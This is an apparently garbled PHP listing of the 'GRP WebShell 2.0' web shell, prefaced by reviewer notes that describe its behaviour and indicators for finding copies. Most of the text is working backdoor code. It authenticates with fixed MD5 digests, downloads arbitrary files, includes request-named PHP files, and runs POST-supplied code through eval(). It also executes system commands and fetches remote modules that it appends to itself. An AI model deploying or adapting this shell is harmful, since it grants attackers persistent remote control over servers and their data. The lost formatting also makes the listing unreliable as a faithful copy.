"File browser", "mysql" => "MySQL");
// ---------------------------------------------------------------------------
// Reviewer notes for the code that follows: bootstrap, helper functions and
// the early request handlers of the script that identifies itself through
// $script_release as "GRP WebShell 2.0".
//
// State of this listing: the original line breaks and the HTML inside the
// string literals have been lost, so every "//" comment below originally
// ended at its own line break and the echo/exit strings are incomplete as
// shown. The array closed on the line above is opened outside this excerpt;
// presumably it is the $modules map iterated further down (not confirmable
// from here).
//
// Authorization: when $auth (set outside this excerpt) is truthy, the script
// demands HTTP Basic credentials and compares md5() of the supplied user name
// and password with the two constant hex digests held in $name and $pass,
// using loose "!=". The digests are unsalted MD5 and are fixed strings in the
// file, so together with the $script_release banner they serve as static
// indicators when searching for copies of this sample. The check reads
// $HTTP_SERVER_VARS, which PHP removed in 5.4; where that array is undefined
// the !isset() test is always true and an enabled check answers 401 to every
// request.
//
// Input handling: error_reporting is chosen from $errors (set outside this
// excerpt). When get_magic_quotes_gpc() reports true, each top-level value of
// $_POST, $_GET, $_FILES and $_COOKIE is passed through stripslashes();
// get_magic_quotes_gpc() itself was removed in PHP 8.0.
//
// Helpers: post_form() and post_empty_form() each keep their own static
// counter $i and echo a form built from $params, one echoed item per
// key/value pair (markup lost in this listing). post_empty_form() returns the
// counter value used for the form it just printed; later code passes that
// value to submit_empty_form() as $i. filesperms() turns the fileperms() bit
// mask into an "ls -l" style string: a type character followed by three rwx
// triplets, with s/S and t/T standing for the 0x0800, 0x0400 and 0x0200 bits.
// filesmtime() formats filemtime() as "d M Y H:i:s". headers() assembles a
// request-line-and-headers text from $_SERVER values.
//
// Request handlers, all selected by $_POST['act'] and placed after the
// authorization check (which applies only when $auth is set):
//   toolz + subact=phpinfo : prints phpinfo() and stops.
//   downfile : joins $_POST['curdir'] and $_POST['file'] with "/" and returns
//              that file as an attachment. The path is neither normalised nor
//              confined to a directory, and $file is written into the
//              Content-Disposition header exactly as received.
//   preview  : chdir()s to $_POST['curdir'], picks a Content-Type from the
//              file extension and streams the file with readfile(); for the
//              "php" extension it calls include() on the request-supplied
//              name instead, which executes that file.
// In captured request bodies the distinguishing shape is a POST to the script
// carrying the fields act, subact, curdir and file.
// ---------------------------------------------------------------------------
// Script version $script_release = "GRP WebShell 2.0 release build 2018 (C)2006,Great"; // Authorization $name='63191e4ece37523c9fe6bb62a5e64d45'; $pass='47ce56ef73da9dec757ef654e6aa1ca1'; $caption="Enter your login and password"; if ($auth && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass)) { header("WWW-Authenticate: Basic realm=\"$caption\""); header("HTTP/1.0 401 Unauthorized"); exit("

Unauthorized access

"); } if($errors) error_reporting(E_ALL&~E_NOTICE); else error_reporting(0); // Strip slashes if(get_magic_quotes_gpc()) { foreach(array("_POST", "_GET", "_FILES", "_COOKIE") as $ar) foreach($GLOBALS[$ar] as $k=>$v) $GLOBALS[$ar][$k] = stripslashes($v); } // Useful functions // Print post form function post_form($name, $params, $a="", $b="") { static $i=0; echo "
\n"; foreach($params as $n=>$v) echo "\n"; echo "$a$name$b
\n"; $i++; } // Print post form without confirmation link function post_empty_form($params) { static $i=0; echo "
\n"; foreach($params as $n=>$v) echo "\n"; echo "
\n"; $i++; return $i-1; } // Print single confirmation link function submit_empty_form($i, $name) { echo "$name"; } // Print single confirmation link with a confirmation message box function confirm_empty_form($i, $name, $msg) { echo "$name"; } // Redirect to URL $to function redirect($to) { echo ""; } // Get string containing file permissions in the form 'lrwxrwxrwx' function filesperms($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 
'T' : '-')); return $info; } // Get string containing file modification time function filesmtime($file) { return date ("d M Y H:i:s", filemtime($file)); } function headers() { return "{$_SERVER['REQUEST_METHOD']} {$_SERVER['PHP_SELF']} {$_SERVER['SERVER_PROTOCOL']}\\n Accept: {$_SERVER['HTTP_ACCEPT']}\\n Accept-Charset: {$_SERVER['HTTP_ACCEPT_CHARSET']}\\n Accept-Encoding: {$_SERVER['HTTP_ACCEPT_ENCODING']}\\n Accept-Language: {$_SERVER['HTTP_ACCEPT_LANGUAGE']}\\n Cache-Control: {$_SERVER['HTTP_CACHE_CONTROL']}\\n Connection: {$_SERVER['HTTP_CONNECTION']}\\n Host: {$_SERVER['HTTP_HOST']}\\n User-Agent: {$_SERVER['HTTP_USER_AGENT']}\\n "; } if($_POST['act']=='toolz' && $_POST['subact']=='phpinfo') die(phpinfo()); if($_POST['act']=='downfile') { $curdir = $_POST['curdir']; $file = $_POST['file']; if(!file_exists($curdir.'/'.$file)) die("Cannot find file ".$curdir.'/'.$file); if(!is_file($curdir.'/'.$file)) die($curdir.'/'.$file." is not a regular file"); Header("Content-Type: application/x-octet-stream"); Header("Content-Disposition: attachement;filename=".$file); die(join('', file($curdir.'/'.$file))); } if($_POST['act']=='preview') { chdir($_POST['curdir']); if(!file_exists($_POST['file'])) die("Can't find file"); $p=explode(".",$_POST['file']); $ext=strtolower($p[count($p)-1]); if(in_array($ext, array('png','jpg','jpeg','bmp','gif','tiff','pcx'))) Header("Content-Type: image/$ext"); elseif(in_array($ext, array('htm', 'html','plg'))) Header("Content-Type: text/html"); elseif(in_array($ext, array('php'))) { include($_POST['file']); die;} else Header("Content-Type: text/plain"); @readfile($_POST['file']); die; } //--------------------------------- // Headers //--------------------------------- ?> <?php echo $script_release;?>
"; post_form("Shell", array(), "", " |"); $mod_loaded = array(); foreach($modules as $module=>$name) { if(function_exists("mod_".$module)) { echo "
"; post_form($name, array("act" => $module), "", " |"); $mod_loaded[] = $module; } } echo ""; post_form("Toolz", array("act" => "toolz")); echo "
       
"; echo "Modules installed:   "; $first = 1; foreach($mod_loaded as $module) { if(!$first) echo ", "; if($module==$_POST['act']) echo "".$module.""; else echo $module; $first=0; } if($first==1) echo "None"; ?> "; ?>

"; } } echo "
Server information
Safe Mode  On
"; } else { echo "Operating system  "; $ver = exec("ver"); if(substr($ver, 0, 9) == "Microsoft") { echo $ver; $os = "win"; } else { $id = exec("id"); if(substr($id, 0, 3) == "uid") { echo exec("uname -srn"); $os = "nix"; } else echo "Unknown, not a Windows "; } if($os == "nix") { echo "
id  ".exec("id")."
Server software  {$_SERVER['SERVER_SOFTWARE']}"; if($os == "nix") { $pwd = exec("pwd"); $defcmd = "ls -liaF"; } elseif($os == "win") { $pwd = exec("cd"); $defcmd = "dir"; } if(empty($pwd)) $pwd = getcwd(); ?>
Client information
Client's IP  
Client's browser  

Tools

"toolz", "subact" => "phpinfo")); $n2 = post_empty_form(array("act" => "toolz", "subact" => "phpcode")); ?>
Append <pre> tags

"; if(isset($_POST['go'])) { echo "

Result is:
"; if($_POST['pre']=="on") { echo "

";
      eval($_POST['code']);
      echo "
"; } else echo eval($_POST['code']); } } ?> Module loader"; if($_POST['subact']=='autoload') { $mod = join('', file($modules_base."mod_".$_POST['module'].".txt")); if($mod===false) die("Module is unavailable"); //echo "Module:
"; $parts = explode('/', $_SERVER['PHP_SELF']); $name = $parts[count($parts)-1]; // Backup copy($name, "~".$name); $f = fopen("grp_repair.php", "w"); if($f) { $crlf = "\r\n"; fwrite($f, ''.""); fclose($f); $repair=1; } else $repair=0; $sh = fopen($name, "a+") or die("Can't open ".$name." to append module");; fwrite($sh, $mod); fclose($sh); echo "Module installed successfully
WARNING! Shell file has been backuped. If you'll have problems with installed module, you can "; if($repair) echo "run 'grp_repair.php' to forget changes"; else echo "backup file manually from '~".$name."' (shell was unable to create self-repairing module)"; echo "
You'll be automatically redirected in 3 seconds"; } else { echo "Supported modules are: "; $first = 1; foreach($modules as $module=>$name) { if(!$first) echo ", "; echo $name." (".$module.")"; $first=0; } if($first==1) echo "None"; echo "
Modules base load URL: $modules_base

Modules can be installed: (Ready, Failure)
"; foreach($modules as $module=>$name) { $mod_form[$module] = post_empty_form(array('act' => 'load_modules', 'subact' => 'autoload', 'module' => $module)); } echo ""; foreach($modules as $module=>$name) { $pre = ""; $post = ""; $mod = @join('', @file($modules_base."mod_".$module.".txt")); if(!preg_match("#function mod_#i", $mod)) $pre = ""; echo ""; } echo "
".$pre.$name." (".$module.")".$post."[SOURCE]"; if(function_exists("mod_".$module)) echo "[ALREADY INSTALLED]"; elseif($pre == "") submit_empty_form($mod_form[$module], "[INSTALL]"); else echo "[CAN'T INSTALL]"; echo "
"; } } // Shell else { // First we check if there has been asked for a working directory if (!empty($work_dir)) { // A workdir has been asked for if (!empty($command)) { if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { // We try and match a cd command if ($regs[1][0] == '/') { $new_dir = $regs[1]; // 'cd /something/...' } else { $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...' } if (file_exists($new_dir) && is_dir($new_dir)) { $work_dir = $new_dir; } unset($command); } } } unset($curdir); if($safe == 1) { die("Safe mode is turned On! Command line is unavailable"); } if(isset($_POST["curdir"])) $curdir = $_POST["curdir"]; else $curdir = $pwd; if($os == "win") $curdir = str_replace("/", "\\", $curdir); ?>

Command: "> Set default []
Disable stderr-grabbing?>
Working directory: Restore as home directory []